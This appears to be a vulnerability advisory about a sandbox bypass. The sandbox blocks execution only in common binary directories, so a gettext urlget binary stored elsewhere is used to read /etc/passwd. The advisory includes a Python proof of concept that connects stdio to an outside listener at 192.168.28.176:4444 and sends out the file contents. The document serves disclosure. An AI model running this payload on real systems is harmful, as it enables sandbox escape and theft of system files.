Summary

Sandbox only restricts the execution permissions of binary files in common directories, such as /bin,/usr/bin, etc. Therefore, attackers can exploit some files with execution permissions in non blacklisted directories to carry out attacks.

Details

Taking the implementation of arbitrary file reading as an example：
It can exploit the system's urlget file to read arbitrary file. The usage method is as follows:

/usr/lib/aarch64-linux-gnu/gettext/urlget /etc/passwd /etc/passwd

The sandbox bypass POC:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.28.176",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/usr/lib/aarch64-linux-gnu/gettext/urlget","/etc/passwd","/etc/passwd"]);

Exploit:

1. The attacker is monitoring port 4444 locally.
2. Executing POC through function library debugging function, attackers obtain file content.

Impact

sandbox bypass